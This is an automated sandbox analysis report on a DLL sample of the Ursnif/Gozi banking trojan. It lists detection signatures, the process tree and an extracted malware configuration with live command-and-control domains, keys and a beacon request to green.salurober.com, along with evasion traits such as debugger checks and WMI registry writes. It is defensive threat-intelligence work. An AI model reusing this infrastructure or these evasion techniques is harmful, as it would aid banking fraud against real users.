Loading ...

Play interactive tourEdit tour

Analysis Report 6a76e615_by_Libranalysis

Overview

General Information

Sample Name:6a76e615_by_Libranalysis (renamed file extension from none to dll)
Analysis ID:406107
MD5:6a76e615a7997fc04e3003ce16c9bc3d
SHA1:90d82c7e8a3f2d3c4ec8e4542605eafbcb07bf95
SHA256:f9f77f992f0c7bf8ec0a39acdac1a343f6418e50510db1f92347d5270d0ab9ab
Tags:Gozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5568 cmdline: loaddll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5384 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1156 cmdline: rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5436 cmdline: rundll32.exe C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll,Surprisefun MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5088 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4364 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5088 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "0dnHb74sj6Vx8GWJZBcafw3TO76HRXTw2xAvtE4gwa2PPH4GC1bS9ornclyyR+kRMdKgigemv76+jMpuzK3GsVW4bUgIZu1wJsCbeT1jaF5kC+5Z1C6WwhCeQEfIn0dyGjO5mUnASq25O8pDwp1usOwI+ce4E6YjxyGNet+kZTTTWPAfmqhY/oVc/59pNJ4uEqRk+ADd1TNfgLrsg26xKI43EH4hpRNWFYgPpsuKC3cgm4UuNnw6ui0jM0gK2wq0zUZ26PkDxSML25mcd8d1kiSEwdUG+0E4a6rwpbhziJ3p5LrDu62+TdIp8Qd07baMfJt0/+VaossEzWbTvcs7R5oksEG/YD69/WtOVAIlyO4=", "c2_domain": ["green.salurober.com", "frm.mironeramp.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "5500", "server": "580", "serpent_key": "vTK10R2O25XUrTRW", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.6e1d0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.3.loaddll32.exe.528d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.3.rundll32.exe.3fe8d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.7c8d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    0.2.loaddll32.exe.6e1d0000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.3.rundll32.exe.3fe8d29.0.raw.unpackMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "0dnHb74sj6Vx8GWJZBcafw3TO76HRXTw2xAvtE4gwa2PPH4GC1bS9ornclyyR+kRMdKgigemv76+jMpuzK3GsVW4bUgIZu1wJsCbeT1jaF5kC+5Z1C6WwhCeQEfIn0dyGjO5mUnASq25O8pDwp1usOwI+ce4E6YjxyGNet+kZTTTWPAfmqhY/oVc/59pNJ4uEqRk+ADd1TNfgLrsg26xKI43EH4hpRNWFYgPpsuKC3cgm4UuNnw6ui0jM0gK2wq0zUZ26PkDxSML25mcd8d1kiSEwdUG+0E4a6rwpbhziJ3p5LrDu62+TdIp8Qd07baMfJt0/+VaossEzWbTvcs7R5oksEG/YD69/WtOVAIlyO4=", "c2_domain": ["green.salurober.com", "frm.mironeramp.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "5500", "server": "580", "serpent_key": "vTK10R2O25XUrTRW", "sleep_time": "10", "SetWaitableTimer_value": "10"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: green.salurober.comVirustotal: Detection: 8%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 6a76e615_by_Libranalysis.dllVirustotal: Detection: 28%Perma Link
                      Source: 6a76e615_by_Libranalysis.dllReversingLabs: Detection: 29%
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: Binary string: c:\include\follow\She job\Smile.pdb source: loaddll32.exe, 00000000.00000002.465005762.000000006E261000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.463287694.000000006E261000.00000002.00020000.sdmp, 6a76e615_by_Libranalysis.dll
                      Source: global trafficHTTP traffic detected: GET /egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL60r80DP/FChSncsB8SqrhdJ/_2FXtQYnl2ITaT9OH4/qVdqvFpku/l5Z_2BwlLO28ejlDZ4Xv/ZR0P9bZC7mrWzK2nsLX/wmJroXqHSsCiyywQoJG_2B/ja6fWO6EY6PRe/fsgqsP8a/8D7PMyq0Et_2Bw5od_2BLED/JSk7_2F_2B/ptgvp19MaEwrG0884/hUO8hPN4NRV3/myPEhfLIkFj/6E7GZZkxutBKlj/2G265rer_2FHZz0gfwlBV/vusAOmr1_/2BAGh_2B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: green.salurober.comConnection: Keep-Alive
                      Source: msapplication.xml0.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7156829e,0x01d742e1</date><accdate>0x7156829e,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                      Source: msapplication.xml0.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7156829e,0x01d742e1</date><accdate>0x7158e55c,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                      Source: msapplication.xml5.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                      Source: msapplication.xml5.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                      Source: msapplication.xml7.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                      Source: msapplication.xml7.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x71600bb4,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                      Source: unknownDNS traffic detected: queries for: green.salurober.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 May 2021 16:36:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                      Source: loaddll32.exe, 00000000.00000002.465196621.000000006E2B1000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.463603336.000000006E2B1000.00000002.00020000.sdmp, 6a76e615_by_Libranalysis.dllString found in binary or memory: http://deeplow.ruB
                      Source: {9B20D491-AED4-11EB-90E4-ECF4BB862DED}.dat.17.drString found in binary or memory: http://green.salurober.com/egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL60
                      Source: msapplication.xml.17.drString found in binary or memory: http://www.amazon.com/
                      Source: msapplication.xml1.17.drString found in binary or memory: http://www.google.com/
                      Source: msapplication.xml2.17.drString found in binary or memory: http://www.live.com/
                      Source: msapplication.xml3.17.drString found in binary or memory: http://www.nytimes.com/
                      Source: msapplication.xml4.17.drString found in binary or memory: http://www.reddit.com/
                      Source: msapplication.xml5.17.drString found in binary or memory: http://www.twitter.com/
                      Source: msapplication.xml6.17.drString found in binary or memory: http://www.wikipedia.com/
                      Source: msapplication.xml7.17.drString found in binary or memory: http://www.youtube.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.329940794.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.528d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3fe8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.7c8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1d0000.2.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.464518953.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389632359.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389705894.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389749777.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389559499.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389608210.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5568, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.329940794.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.528d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3fe8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.7c8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1d0000.2.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.464518953.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389632359.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389705894.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389749777.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389559499.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389608210.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5568, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D1B89 NtMapViewOfSection,0_2_6E1D1B89
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D18D1 GetProcAddress,NtCreateSection,memset,0_2_6E1D18D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D2485 NtQueryVirtualMemory,0_2_6E1D2485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D2485 NtQueryVirtualMemory,3_2_6E1D2485
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D22640_2_6E1D2264
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E219FB00_2_6E219FB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E204C100_2_6E204C10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2384F00_2_6E2384F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21AD900_2_6E21AD90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D22643_2_6E1D2264
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E219FB03_2_6E219FB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E204C103_2_6E204C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2384F03_2_6E2384F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21AD903_2_6E21AD90
                      Source: 6a76e615_by_Libranalysis.dllBinary or memory string: OriginalFilenameSmile.dllX vs 6a76e615_by_Libranalysis.dll
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: classification engineClassification label: mal88.troj.winDLL@10/22@1/1
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF8CF38F8205796A33.TMPJump to behavior
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll,Surprisefun
                      Source: 6a76e615_by_Libranalysis.dllVirustotal: Detection: 28%
                      Source: 6a76e615_by_Libranalysis.dllReversingLabs: Detection: 29%
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll,Surprisefun
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1
                      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5088 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll,SurprisefunJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5088 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\include\follow\She job\Smile.pdb source: loaddll32.exe, 00000000.00000002.465005762.000000006E261000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.463287694.000000006E261000.00000002.00020000.sdmp, 6a76e615_by_Libranalysis.dll
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D1F31 LoadLibraryA,GetProcAddress,0_2_6E1D1F31
                      Source: 6a76e615_by_Libranalysis.dllStatic PE information: real checksum: 0xda527 should be: 0xe3e03
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D2200 push ecx; ret 0_2_6E1D2209
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D2253 push ecx; ret 0_2_6E1D2263
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2A36DD pushad ; ret 0_2_6E2A36DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D2200 push ecx; ret 3_2_6E1D2209
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D2253 push ecx; ret 3_2_6E1D2263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2A36DD pushad ; ret 3_2_6E2A36DE

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.329940794.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.528d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3fe8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.7c8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1d0000.2.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.464518953.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389632359.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389705894.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389749777.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389559499.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389608210.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5568, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E203B20 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E203B20
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D1F31 LoadLibraryA,GetProcAddress,0_2_6E1D1F31
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2A1A61 mov eax, dword ptr fs:[00000030h]0_2_6E2A1A61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2A159E push dword ptr fs:[00000030h]0_2_6E2A159E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2A1997 mov eax, dword ptr fs:[00000030h]0_2_6E2A1997
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2A1A61 mov eax, dword ptr fs:[00000030h]3_2_6E2A1A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2A159E push dword ptr fs:[00000030h]3_2_6E2A159E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2A1997 mov eax, dword ptr fs:[00000030h]3_2_6E2A1997
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E203B20 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E203B20
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1FB460 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E1FB460
